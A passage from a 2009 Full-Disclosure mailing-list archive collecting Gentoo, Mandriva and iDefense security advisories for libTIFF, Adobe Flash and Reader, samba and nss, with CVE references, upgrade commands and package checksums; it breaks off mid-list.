Copyright ? 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iD8DBQFKe0W1bjs6HoxIfBkRAlQLAKCJHohcKfI8Emv5OfSk7LMotPL/7ACfb4Wa JyhMGxPvQ4AfdaK6dfmcIlg= =OPoC -----END PGP SIGNATURE----- From rbu at gentoo.org Fri Aug 7 12:49:24 2009 From: rbu at gentoo.org (Robert Buchholz) Date: Fri, 7 Aug 2009 13:49:24 +0200 Subject: [Full-disclosure] [ GLSA 200908-03 ] libTIFF: User-assisted execution of arbitrary code Message-ID: <200908071349.27613.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200908-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libTIFF: User-assisted execution of arbitrary code Date: August 07, 2009 Bugs: #276339, #276988 ID: 200908-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple boundary checking vulnerabilities in libTIFF may allow for the remote execution of arbitrary code. Background ========== libTIFF provides support for reading and manipulating TIFF (Tagged Image File Format) images. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-libs/tiff < 3.8.2-r8 >= 3.8.2-r8 Description =========== Two vulnerabilities have been reported in libTIFF: * wololo reported a buffer underflow in the LZWDecodeCompat() function (CVE-2009-2285). * Tielei Wang of ICST-ERCIS, Peking University reported two integer overflows leading to heap-based buffer overflows in the tiff2rgba and rgb2ycbcr tools (CVE-2009-2347). Impact ====== A remote attacker could entice a user to open a specially crafted TIFF file with an application making use of libTIFF or the tiff2rgba and rgb2ycbcr tools, possibly resulting in the execution of arbitrary code with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All libTIFF users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/tiff-3.8.2-r8" References ========== [ 1 ] CVE-2009-2285 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2285 [ 2 ] CVE-2009-2347 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2347 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200908-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 836 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090807/1ecce4a4/attachment.bin From rbu at gentoo.org Fri Aug 7 13:01:32 2009 From: rbu at gentoo.org (Robert Buchholz) Date: Fri, 7 Aug 2009 14:01:32 +0200 Subject: [Full-disclosure] [ GLSA 200908-04 ] Adobe products: Multiple vulnerabilities Message-ID: <200908071401.34386.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200908-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Adobe products: Multiple vulnerabilities Date: August 07, 2009 Bugs: #278813, #278819 ID: 200908-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Adobe Reader and Adobe Flash Player allow for attacks including the remote execution of arbitrary code. Background ========== Adobe Flash Player is a closed-source playback software for Flash SWF files. Adobe Reader is a closed-source PDF reader that plays Flash content as well. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-plugins/adobe-flash < 10.0.32.18 >= 10.0.32.18 2 app-text/acroread < 9.1.3 >= 9.1.3 ------------------------------------------------------------------- 2 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== Multiple vulnerabilities have been reported in Adobe Flash Player: * lakehu of Tencent Security Center reported an unspecified memory corruption vulnerability (CVE-2009-1862). * Mike Wroe reported an unspecified vulnerability, related to "privilege escalation" (CVE-2009-1863). * An anonymous researcher through iDefense reported an unspecified heap-based buffer overflow (CVE-2009-1864). * Chen Chen of Venustech reported an unspecified "null pointer vulnerability" (CVE-2009-1865). * Chen Chen of Venustech reported an unspecified stack-based buffer overflow (CVE-2009-1866). * Joran Benker reported that Adobe Flash Player facilitates "clickjacking" attacks (CVE-2009-1867). * Jun Mao of iDefense reported a heap-based buffer overflow, related to URL parsing (CVE-2009-1868). * Roee Hay of IBM Rational Application Security reported an unspecified integer overflow (CVE-2009-1869). * Gareth Heyes and Microsoft Vulnerability Research reported that the sandbox in Adobe Flash Player allows for information disclosure, when "SWFs are saved to the hard drive" (CVE-2009-1870). Impact ====== A remote attacker could entice a user to open a specially crafted PDF file or web site containing Adobe Flash (SWF) contents, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service (application crash). Furthermore, a remote attacker could trick a user into clicking a button on a dialog by supplying a specially crafted SWF file and disclose sensitive information by exploiting a sandbox issue. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.0.32.18" All Adobe Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-9.1.3" References ========== [ 1 ] CVE-2009-1862 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1862 [ 2 ] CVE-2009-1863 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1863 [ 3 ] CVE-2009-1864 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1864 [ 4 ] CVE-2009-1865 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1865 [ 5 ] CVE-2009-1866 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1866 [ 6 ] CVE-2009-1867 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1867 [ 7 ] CVE-2009-1868 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1868 [ 8 ] CVE-2009-1869 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1869 [ 9 ] CVE-2009-1870 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1870 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200908-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 836 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090807/23ae662b/attachment.bin From security at mandriva.com Fri Aug 7 17:45:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 07 Aug 2009 18:45:01 +0200 Subject: [Full-disclosure] [ MDVSA-2009:196 ] samba Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:196 http://www.mandriva.com/security/ _______________________________________________________________________ Package : samba Date : August 7, 2009 Affected: 2009.0, Enterprise Server 5.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in samba: Multiple format string vulnerabilities in client/client.c in smbclient in Samba 3.2.0 through 3.2.12 might allow context-dependent attackers to execute arbitrary code via format string specifiers in a filename (CVE-2009-1886). The acl_group_override function in smbd/posix_acls.c in smbd in Samba 3.0.x before 3.0.35, 3.1.x and 3.2.x before 3.2.13, and 3.3.x before 3.3.6, when dos filemode is enabled, allows remote attackers to modify access control lists for files via vectors related to read access to uninitialized memory (CVE-2009-1888). This update provides samba 3.2.13 to address these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1886 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1888 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.0: e560c29e7403b4cba66a0af49ca2ae7c 2009.0/i586/libnetapi0-3.2.13-0.2mdv2009.0.i586.rpm 30594671d155a78c5ef2bb6884fb48c7 2009.0/i586/libnetapi-devel-3.2.13-0.2mdv2009.0.i586.rpm 1991fdbc46b32ef1524d1e3a2bac1740 2009.0/i586/libsmbclient0-3.2.13-0.2mdv2009.0.i586.rpm fef67835324adf11412cb7d1d91f6002 2009.0/i586/libsmbclient0-devel-3.2.13-0.2mdv2009.0.i586.rpm 70954d4b5ae651bf24858dc2ce21cd42 2009.0/i586/libsmbclient0-static-devel-3.2.13-0.2mdv2009.0.i586.rpm 9f9c22b65704a296b13a6fc5353572c0 2009.0/i586/libsmbsharemodes0-3.2.13-0.2mdv2009.0.i586.rpm fbbd2a30a11fc6ff96e2f48e980e3ca1 2009.0/i586/libsmbsharemodes-devel-3.2.13-0.2mdv2009.0.i586.rpm 6502c7f11c59ca41dd75d6c308ece50b 2009.0/i586/libtalloc1-3.2.13-0.2mdv2009.0.i586.rpm 9b11a3cd2a9e57e650730c9d932cbe59 2009.0/i586/libtalloc-devel-3.2.13-0.2mdv2009.0.i586.rpm c5cde67f780ad0b519cce0edf2f84b35 2009.0/i586/libtdb1-3.2.13-0.2mdv2009.0.i586.rpm f86a61c041ff4b3ce340b8538fb3fad0 2009.0/i586/libtdb-devel-3.2.13-0.2mdv2009.0.i586.rpm 63d98b035746c755e6ef9ccc20b6aa54 2009.0/i586/libwbclient0-3.2.13-0.2mdv2009.0.i586.rpm fe1d9de3586f62f7f71d3fb8543afb05 2009.0/i586/libwbclient-devel-3.2.13-0.2mdv2009.0.i586.rpm 4b8e0e89f421a8cf3d9098509f89df31 2009.0/i586/mount-cifs-3.2.13-0.2mdv2009.0.i586.rpm 55e106b2e362d3a170b610dcc56a95ca 2009.0/i586/nss_wins-3.2.13-0.2mdv2009.0.i586.rpm 18d89f67875c05a49101adfa4e8158a6 2009.0/i586/samba-client-3.2.13-0.2mdv2009.0.i586.rpm 6857e6b62dececc2b1cdba210d1bc60d 2009.0/i586/samba-common-3.2.13-0.2mdv2009.0.i586.rpm 6e5f88bb6bca89cae7d6f81629a993a2 2009.0/i586/samba-doc-3.2.13-0.2mdv2009.0.i586.rpm b9afd040b14654f9abb0fe44a80967c8 2009.0/i586/samba-server-3.2.13-0.2mdv2009.0.i586.rpm 9dcf16a44adf335c3978b407d2c24458 2009.0/i586/samba-swat-3.2.13-0.2mdv2009.0.i586.rpm 89e54f80f8d87d7d645da21ab1b3c6ae 2009.0/i586/samba-winbind-3.2.13-0.2mdv2009.0.i586.rpm 853a7a0d04efb98ccd1b86389e606477 2009.0/SRPMS/samba-3.2.13-0.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b8ca0a3e779b512b317e964669342bde 2009.0/x86_64/lib64netapi0-3.2.13-0.2mdv2009.0.x86_64.rpm a232c45d2dc2daa2245edd061fb7522d 2009.0/x86_64/lib64netapi-devel-3.2.13-0.2mdv2009.0.x86_64.rpm 31f5d6c964ede6056e75eafa883be697 2009.0/x86_64/lib64smbclient0-3.2.13-0.2mdv2009.0.x86_64.rpm 804794a279e87d9800d7a2de2883dfd6 2009.0/x86_64/lib64smbclient0-devel-3.2.13-0.2mdv2009.0.x86_64.rpm 6b41b9baaed9ab4be204c013a2f70c23 2009.0/x86_64/lib64smbclient0-static-devel-3.2.13-0.2mdv2009.0.x86_64.rpm 99e49f97d78ea96f42c217c75ae3fb5b 2009.0/x86_64/lib64smbsharemodes0-3.2.13-0.2mdv2009.0.x86_64.rpm 0480776e8e155c33b5ab05ab98a44e20 2009.0/x86_64/lib64smbsharemodes-devel-3.2.13-0.2mdv2009.0.x86_64.rpm 883a70cf9b7c7cf2c25905cd8509b761 2009.0/x86_64/lib64talloc1-3.2.13-0.2mdv2009.0.x86_64.rpm 86b45439f801e342b5b47a0de14cc26f 2009.0/x86_64/lib64talloc-devel-3.2.13-0.2mdv2009.0.x86_64.rpm 16454ad3e8652a9d3eb699d8c61bf47b 2009.0/x86_64/lib64tdb1-3.2.13-0.2mdv2009.0.x86_64.rpm 6ecebcae2880cc287195f0df3478f602 2009.0/x86_64/lib64tdb-devel-3.2.13-0.2mdv2009.0.x86_64.rpm dda3d4bee0e04ca670c987d6529304c5 2009.0/x86_64/lib64wbclient0-3.2.13-0.2mdv2009.0.x86_64.rpm 2ee38c52565088b3f074d69e7e4525cf 2009.0/x86_64/lib64wbclient-devel-3.2.13-0.2mdv2009.0.x86_64.rpm d97168bc98f06e08bfbd311c0b569f80 2009.0/x86_64/mount-cifs-3.2.13-0.2mdv2009.0.x86_64.rpm fb8b49a66055787e0dc711c0284ede5f 2009.0/x86_64/nss_wins-3.2.13-0.2mdv2009.0.x86_64.rpm 98fa55b725abf3122de9c1a379ada0be 2009.0/x86_64/samba-client-3.2.13-0.2mdv2009.0.x86_64.rpm 333ac01dc9006cb1a5373d5ed0d8a8d8 2009.0/x86_64/samba-common-3.2.13-0.2mdv2009.0.x86_64.rpm 13dd58dd57bc701a8435bc08e53a86d3 2009.0/x86_64/samba-doc-3.2.13-0.2mdv2009.0.x86_64.rpm 76173d6b22d6ebbe278785e395114638 2009.0/x86_64/samba-server-3.2.13-0.2mdv2009.0.x86_64.rpm 3cd76bb72d24726258fa7a3ddca4ba5b 2009.0/x86_64/samba-swat-3.2.13-0.2mdv2009.0.x86_64.rpm b6d64c576008dcb247b84397709f57ee 2009.0/x86_64/samba-winbind-3.2.13-0.2mdv2009.0.x86_64.rpm 853a7a0d04efb98ccd1b86389e606477 2009.0/SRPMS/samba-3.2.13-0.2mdv2009.0.src.rpm Mandriva Enterprise Server 5: 69d3bf5264b42006b6d29806d7148304 mes5/i586/libnetapi0-3.2.13-0.2mdvmes5.i586.rpm e105411f90103f58af8c32b5659a3663 mes5/i586/libnetapi-devel-3.2.13-0.2mdvmes5.i586.rpm 6caac3db13b68866b133480fc2ac24c3 mes5/i586/libsmbclient0-3.2.13-0.2mdvmes5.i586.rpm 36672e9387601118c0a7d1eda4e586e9 mes5/i586/libsmbclient0-devel-3.2.13-0.2mdvmes5.i586.rpm dcef8f37c61352976bdbe3d2f4eb6b83 mes5/i586/libsmbclient0-static-devel-3.2.13-0.2mdvmes5.i586.rpm e466863ee1addc9575f9628e2b5534c8 mes5/i586/libsmbsharemodes0-3.2.13-0.2mdvmes5.i586.rpm bc3938d90434500f79157d9b20a6652f mes5/i586/libsmbsharemodes-devel-3.2.13-0.2mdvmes5.i586.rpm 6dc5996b9cbb4102d40d8e1a8aca7003 mes5/i586/libtalloc1-3.2.13-0.2mdvmes5.i586.rpm 2d55b4ece3ed1a5623ff4e1728feba8f mes5/i586/libtalloc-devel-3.2.13-0.2mdvmes5.i586.rpm a50cdba2a0c5b183f021771958a307ca mes5/i586/libtdb1-3.2.13-0.2mdvmes5.i586.rpm e739b717df5142e0de31784ef46c19ea mes5/i586/libtdb-devel-3.2.13-0.2mdvmes5.i586.rpm bdda31bfc67f2b38e97b017a01a99954 mes5/i586/libwbclient0-3.2.13-0.2mdvmes5.i586.rpm ba39d40a934553466653ab3ae15150dd mes5/i586/libwbclient-devel-3.2.13-0.2mdvmes5.i586.rpm 38b55ad1d8a225ace7b4a5ad9cc068a8 mes5/i586/mount-cifs-3.2.13-0.2mdvmes5.i586.rpm ef930361464e5987300a2c68623605b0 mes5/i586/nss_wins-3.2.13-0.2mdvmes5.i586.rpm 1dec5cfa4740ebe79b7b9e57b701c571 mes5/i586/samba-client-3.2.13-0.2mdvmes5.i586.rpm dba7905d92718f15026c74856a5fd11a mes5/i586/samba-common-3.2.13-0.2mdvmes5.i586.rpm be93a92f129b90a82683b2d5ed798086 mes5/i586/samba-doc-3.2.13-0.2mdvmes5.i586.rpm 7065565daa66360f5c1f037fd5e11bde mes5/i586/samba-server-3.2.13-0.2mdvmes5.i586.rpm efb3b8d697cdfea9297581749a3774d3 mes5/i586/samba-swat-3.2.13-0.2mdvmes5.i586.rpm 56e3121bb0b17cc0e7208ad7cf897861 mes5/i586/samba-winbind-3.2.13-0.2mdvmes5.i586.rpm e37bf698cb6291fabb03c191822940a4 mes5/SRPMS/samba-3.2.13-0.2mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 5c81cae7fb76d796272a9995e6c3b7c6 mes5/x86_64/lib64netapi0-3.2.13-0.2mdvmes5.x86_64.rpm c8ca656e7706b2f0ffca58483e7a315f mes5/x86_64/lib64netapi-devel-3.2.13-0.2mdvmes5.x86_64.rpm b09f4161a8dc94fc286475d379d5f184 mes5/x86_64/lib64smbclient0-3.2.13-0.2mdvmes5.x86_64.rpm 4605d39bdcce2156aa57915ac0cd9805 mes5/x86_64/lib64smbclient0-devel-3.2.13-0.2mdvmes5.x86_64.rpm 636b818e46df1740bc5a0b0a9e07bade mes5/x86_64/lib64smbclient0-static-devel-3.2.13-0.2mdvmes5.x86_64.rpm 2ccaec3e555174c9f01be4d56fb0bcec mes5/x86_64/lib64smbsharemodes0-3.2.13-0.2mdvmes5.x86_64.rpm 942ab9c47844b304bc614dda4f92af43 mes5/x86_64/lib64smbsharemodes-devel-3.2.13-0.2mdvmes5.x86_64.rpm e9615b13fab8296413c6c1b090d274fd mes5/x86_64/lib64talloc1-3.2.13-0.2mdvmes5.x86_64.rpm 2694c1b30151bca31e67b42dfe19bbd9 mes5/x86_64/lib64talloc-devel-3.2.13-0.2mdvmes5.x86_64.rpm fe2909c38bc45d6de90960e294352908 mes5/x86_64/lib64tdb1-3.2.13-0.2mdvmes5.x86_64.rpm 0cf2b56b5da499c8facdefff4d94b0bd mes5/x86_64/lib64tdb-devel-3.2.13-0.2mdvmes5.x86_64.rpm 54e33bc818f206dc9164faf76e85fc5c mes5/x86_64/lib64wbclient0-3.2.13-0.2mdvmes5.x86_64.rpm 88ed36e49c31f49a66a86fa4ff8e2b25 mes5/x86_64/lib64wbclient-devel-3.2.13-0.2mdvmes5.x86_64.rpm 0c2a3fda8a2daf1d6ff7be6e36c4a077 mes5/x86_64/mount-cifs-3.2.13-0.2mdvmes5.x86_64.rpm 29723b335614bd95ed628de185094fa5 mes5/x86_64/nss_wins-3.2.13-0.2mdvmes5.x86_64.rpm a29c280fafbbcb2dfb42ea8bc8c56ae3 mes5/x86_64/samba-client-3.2.13-0.2mdvmes5.x86_64.rpm 3636cd013a6e529f18d4b49455c9a686 mes5/x86_64/samba-common-3.2.13-0.2mdvmes5.x86_64.rpm 91a2df862fd97dcd6b6396e788da1206 mes5/x86_64/samba-doc-3.2.13-0.2mdvmes5.x86_64.rpm 1f4c9cbc1f8dc635e7a1aa3d5523d807 mes5/x86_64/samba-server-3.2.13-0.2mdvmes5.x86_64.rpm bb1172236f7389c22d942f804c9e34a1 mes5/x86_64/samba-swat-3.2.13-0.2mdvmes5.x86_64.rpm 55bdb438e23ae8e3cc131298800d9a98 mes5/x86_64/samba-winbind-3.2.13-0.2mdvmes5.x86_64.rpm e37bf698cb6291fabb03c191822940a4 mes5/SRPMS/samba-3.2.13-0.2mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKfC47mqjQ0CJFipgRAkmVAKDi+Xf6tkPhj3JcORD5Amnalh4SqgCgwyVn aO4amfUxj9NmDgveW0qyYhw= =/U8f -----END PGP SIGNATURE----- From labs-no-reply at idefense.com Fri Aug 7 18:49:03 2009 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 07 Aug 2009 13:49:03 -0400 Subject: [Full-disclosure] iDefense Security Advisory 08.07.09: Adobe Flash Player Invalid Loader Object Reference Vulnerability Message-ID: <4A7C690F.706@idefense.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDefense Security Advisory 07.30.09 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 30, 2009 I. BACKGROUND Adobe Flash Player is a very popular web browser plugin. It is available for multiple web browsers and platforms, including Windows, Linux and MacOS. Flash Player enables web browsers to display rich multimedia content, such as online videos, and is often a requirement for popular websites. For more information, see the vendor's site found at the following link. http://www.adobe.com/products/flashplayer II. DESCRIPTION Remote exploitation of an invalid Loader object reference vulnerability in Adobe Systems Inc.'s Flash Player could allow an attacker to execute arbitrary code with the privileges of the current user. During the processing of a Shockwave Flash file, an object can be created, along with multiple references that point to the object. The object can be destroyed and its associated references removed. However a reference can incorrectly remain pointing to the object. The invalid object resides in uninitialized memory, which the attacker may control to gain arbitrary execution control. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user viewing the web page. To exploit this vulnerability, a targeted user must load a malicious Shockware Flash file created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into a compromised, trusted site. IV. DETECTION iDefense has confirmed the existence of this vulnerability in latest Flash Player version 9.0.124.0. Previous versions may also be affected. V. WORKAROUND A Internet Explorer plugin is available to temporarily block and unblock Flash content using a single click. Only trusted sites should be unblocked when using this plugin. More information is available at: http://flash.melameth.com. A Firefox plugin is available to temporarily block and unblock Flash content using a single click. Only trusted sites should be unblocked when using this plugin. More information is available at: http://flashblock.mozdev.org. VI. VENDOR RESPONSE Adobe has released a patch which addresses this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown. http://www.adobe.com/support/security/bulletins/apsb09-10.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-1864 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 08/25/2008 - Initial Contact 09/22/2008 - Second Contact attempt 09/22/2008 - PoC Requested 09/24/2008 - PoC Requested 11/05/2008 - PoC Sent 11/06/2008 - Clarification requested 11/21/2008 - Clarification requested 12/05/2008 - Clarification Sent 12/05/2008 - Clarification requested 12/07/2008 - Additional Clarification Sent 02/24/2009 - Status update received - no estimated release date 04/05/2009 - Clarification requested 05/05/2009 - Clarification sent 05/06/2009 - Clarification requested 05/06/2009 - Clarification sent 05/11/2009 - Tentative disclosure set to August 07/30/2009 - Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iD8DBQFKfGkMbjs6HoxIfBkRAt5JAKCnub8oL4Pe/sDhKzr4UaxMnggZiwCeJQgA MqhVQUn3gsc2sSeDTdiYjOY= =hp0G -----END PGP SIGNATURE----- From security at mandriva.com Fri Aug 7 22:59:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 07 Aug 2009 23:59:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:197 ] nss Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:197 http://www.mandriva.com/security/ _______________________________________________________________________ Package : nss Date : August 7, 2009 Affected: 2009.0, 2009.1, Enterprise Server 5.0 _______________________________________________________________________ Problem Description: Security issues in nss prior to 3.12.3 could lead to a man-in-the-middle attack via a spoofed X.509 certificate (CVE-2009-2408) and md2 algorithm flaws (CVE-2009-2409), and also cause a denial-of-service and possible code execution via a long domain name in X.509 certificate (CVE-2009-2404). This update provides the latest versions of NSS and NSPR libraries which are not vulnerable to those attacks. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2404 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.0: f1a3c79a29336f72dee81f2c2ce77079 2009.0/i586/libnspr4-4.7.5-0.1mdv2009.0.i586.rpm c703c373c35f68e17e09c9b3edc60dee 2009.0/i586/libnspr-devel-4.7.5-0.1mdv2009.0.i586.rpm 2db7bcea1b239d1a56112fd7ba8ffb9e 2009.0/i586/libnss3-3.12.3.1-0.1mdv2009.0.i586.rpm b3e4bc2a61001ac0d7e8dec04eda7d84 2009.0/i586/libnss-devel-3.12.3.1-0.1mdv2009.0.i586.rpm eb7094fe1affd15a0386e61b41fcf2d9 2009.0/i586/libnss-static-devel-3.12.3.1-0.1mdv2009.0.i586.rpm e13ff7a2350c4758c3cef8d0ad22187e 2009.0/i586/nss-3.12.3.1-0.1mdv2009.0.i586.rpm c4b21c10b38d3ed7555ab4abd2294c3f 2009.0/SRPMS/nspr-4.7.5-0.1mdv2009.0.src.rpm 745ed32d19b1b58b86669b77b6dc9cef 2009.0/SRPMS/nss-3.12.3.1-0.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 79a4f1a583f81bce7f8c62986b709220 2009.0/x86_64/lib64nspr4-4.7.5-0.1mdv2009.0.x86_64.rpm 11fbdd2a7ce6d93676c07102bc9e2f8e 2009.0/x86_64/lib64nspr-devel-4.7.5-0.1mdv2009.0.x86_64.rpm 87ed9bd3b8f6396a56fb08ea9b2d6bfc 2009.0/x86_64/lib64nss3-3.12.3.1-0.1mdv2009.0.x86_64.rpm 3f63723ad79452362f0cbdcc2c864ed7 2009.0/x86_64/lib64nss-devel-3.12.3.1-0.1mdv2009.0.x86_64.rpm f425d17a91029ff65b4a9b2aa7d9f8cc 2009.0/x86_64/lib64nss-static-devel-3.12.3.1-0.1mdv2009.0.x86_64.rpm feba467cc0589c40ae61800cba1ab12d 2009.0/x86_64/nss-3.12.3.1-0.1mdv2009.0.x86_64.rpm c4b21c10b38d3ed7555ab4abd2294c3f 2009.0/SRPMS/nspr-4.7.5-0.1mdv2009.0.src.rpm 745ed32d19b1b58b86669b77b6dc9cef 2009.0/SRPMS/nss-3.12.3.1-0.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 8cd8c4b87b27e0448f2560114bd83bb3 2009.1/i586/libnspr4-4.7.5-0.1mdv2009.1.i586.rpm 82ce975b0c3d55c09c6e5157a4627101 2009.1/i586/libnspr-devel-4.7.5-0.1mdv2009.1.i586.rpm 93906e880dec09678a7738bd147967d5 2009.1/i586/libnss3-3.12.3.1-0.1mdv2009.1.i586.rpm 1059c53a7c0bbbe57f44dd748df5f530 2009.1/i586/libnss-devel-3.12.3.1-0.1mdv2009.1.i586.rpm 1f2b1e8f2a8aee4d5f4a301f0f88c96b 2009.1/i586/libnss-static-devel-3.12.3.1-0.1mdv2009.1.i586.rpm 45297bcc9da17bcdb6515b1ded9d0b56 2009.1/i586/nss-3.12.3.1-0.1mdv2009.1.i586.rpm 6ce5146371c4f730f89205041c8747c2 2009.1/SRPMS/nspr-4.7.5-0.1mdv2009.1.src.rpm 3b19dc2f4f2265516b39a194f32469ae 2009.1/SRPMS/nss-3.12.3.1-0.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 998b4a57be0efb4babb9b7fea094e194 2009.1/x86_64/lib64nspr4-4.7.5-0.1mdv2009.1.x86_64.rpm 7631098c5bd6ca484295f8240e381846 2009.1/x86_64/lib64nspr-devel-4.7.5-0.1mdv2009.1.x86_64.rpm 67596dbf16bd7d7472607870e81fdd5e 2009.1/x86_64/lib64nss3-3.12.3.1-0.1mdv2009.1.x86_64.rpm a306fc84ee4a87beb53bfd0927726624 2009.1/x86_64/lib64nss-devel-3.12.3.1-0.1mdv2009.1.x86_64.rpm b55efb339da1e02fc30dd12cfc481447 